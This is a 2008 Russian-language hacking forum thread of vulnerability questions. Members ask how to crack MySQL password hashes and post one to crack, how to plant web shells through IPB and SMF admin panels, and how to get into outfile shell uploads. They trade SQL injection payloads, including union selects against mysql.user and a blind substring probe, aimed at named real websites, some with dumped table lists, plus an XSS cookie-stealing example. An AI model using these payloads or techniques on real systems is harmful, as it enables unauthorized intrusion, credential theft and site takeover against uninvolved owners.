Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Подскажите как правильно подобрать пароль к хэшу mysql при помощи PaswordsPro. Каким перебором лучше пользоваться? Может есть какието базы паролей?
     
  2. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    0nep@t0p я ей и пользуюсь, атака полным перебором, но вот незнаю найдет он что нить? Подскажи, как правильно ей пользоваться. Она у меня все процессы сожрала...
     
  3. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    blackybr ну тогда curl/get/fetch/lynx/etc
    просто это уже было написано я дописал ещё способ))
     
  4. XaCeRoC

    XaCeRoC Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    62
    Likes Received:
    23
    Reputations:
    -12
    Подскажите как залить шелл через админку в IpB v2.3.1
     
  5. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    >> Подскажите как залить шелл через админку в IpB v2.3.1

    Есть возможность запросов к бд?
     
  6. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Ребят вот такая конструкция - "id_rubric=9999+union+select+1,mysql.user.password,3+from+mysql.user/*" не помогает, что делать?

    Эта тоже непомогает - "id_rubric=9999+union+select+1,concat_ws(0x2F,user,password),3+from+mysql.user/*" :(
     
    #1346 mff, 23 Mar 2008
    Last edited: 23 Mar 2008
  7. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Прочитай хоть брошюрку по sql =\
    select blablabla FROM mysql.user
     
  8. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    во всех ипб остается заливка шелла
    1) через евал в шаблонах
    2) через "raw php..." ищите где )
     
  9. Rogun

    Rogun Elder - Старейшина

    Joined:
    12 Feb 2008
    Messages:
    76
    Likes Received:
    4
    Reputations:
    0
    Где можно скачать шелл для SMF1.1.4 для залития в админку?
    вот тема про залития а шелл сам я ненашол((

    http://forum.antichat.ru/thread43633.html
     
  10. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Банально не хватает прав
    http://toxa.nov.ru/z.txt
     
    _________________________
    1 person likes this.
  11. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227

    Жесть, а что то можно еще сделать?
     
  12. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Ребят поделитесь скриптами для облегчения работы со скулью. Поиск на форуме не помагает :(

    Всем за ранее спасибо!
     
  13. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    http://toxa.nov.ru/sql.txt
    искать таблицы юзеров\админов например или пытаться залить шелл через into outfile
     
    _________________________
  14. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Учусь!
    Украинский морской институт
    ---------------------------------------------------------
    5.0.22-log:vnmamontov9_umi:umi@localhost
    ---------------------------------------------------------
    доступ к information_schema.tables но там нету ничего интересного
    есть форум, судя по исходникам smf
    но таблицы smf_members несуществует.
    Очень интересно, есть ли вариант вытянуть что нибудь интересное или может я неправильно определил форум?
    -----------------------------------------------------
    тоже очень интересная-вывода вообще никакого нет, подскажите как быть в этом случае?(подзапросы?)
    -----------------------------------------------------
    информативный вывод, но у меня все же ничего не получилось
    -------------------------------------------------------
    Всем, кто откликнется-СПАСИБО
     
  15. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    2 samarin
    бд с форумом тебе недоступна .
    все таблцы те доступные
    Code:
    CHARACTER_SETS
    COLLATIONS
    COLLATION_CHARACTER_SET_APPLICABILITY
    COLUMNS
    COLUMN_PRIVILEGES
    KEY_COLUMN_USAGE
    ROUTINES
    SCHEMATA
    SCHEMA_PRIVILEGES
    STATISTICS
    TABLES
    TABLE_CONSTRAINTS
    TABLE_PRIVILEGES
    TRIGGERS
    USER_PRIVILEGES
    VIEWS
    announcements
    collective
    course_price
    group_collective
    lib_new_receipts
    lib_news
    lib_receipts
    lib_receipts_page
    news
    resources
    resources_part
    utc_news
    во втором случае тебе надо найти хотя бы одну существующую таблицу, а дальше уже будет возможен посимвольный перебор, типа
    Code:
    http://www.housemarket.com.ua/catalog.html?id=3+and+if(substring(version(),1,1)=5,(select+1+from+xxx),(select+1+from+xxx+limit+0,1))/*
    Вместо xxx пишешь свою таблицу. При выполнении условия будет ошибка, при невыполнении - пустой лист.
     
    _________________________
    #1355 +toxa+, 23 Mar 2008
    Last edited: 23 Mar 2008
  16. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Я ж писал
    покрайней мере интересного я не нашел
     
    #1356 samarin, 23 Mar 2008
    Last edited: 23 Mar 2008
  17. Titop

    Titop New Member

    Joined:
    20 Sep 2007
    Messages:
    16
    Likes Received:
    2
    Reputations:
    1
    В общем таскался по вашему форуму,что бы задать конктретные вопросы по xss уязвимостям,но нифига не нашел.Почитал статейки, и вот что меня интересует.
    1.xss- это ведь не глупый перебор типа '><script>alert(document.cookie)</script>,или другие возможные варианты подставления в панель адреса?
    2.где я могу найти подробный мануал по xss?все ссылки о xss я здесь просматрел
    и гугль тоже юзаю.
     
  18. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    народ, объясните пожалуйста почему столбцы показывает только при таком запросе
    http://www.jushhome.com/AmMoviePort/links.asp?CatId=-99999+UNION+SELECT+1,2,3,4,5,6,7,8+from+users
    а не как обычно
    http://www.jushhome.com/AmMoviePort/links.asp?CatId=-99999+UNION+SELECT+1,2,3,4,5,6,7,8/*
    ась? ;)

    кто-нибудь гляньте меня интересует этот вопрос.
     
    #1358 bag, 24 Mar 2008
    Last edited: 24 Mar 2008
  19. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    https://forum.antichat.ru/thread42326.html
     
    _________________________
  20. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Люди есть у кого словари под PasswordsPro для атаки MySQL хэшей, поделитесь, плис.
    Или может кто посоветует другую программу для расшифровки вот такого хэша:6cb1963d2018c3ea

    Буду очень признателен!
    Спасибо!
     
Thread Status:
Not open for further replies.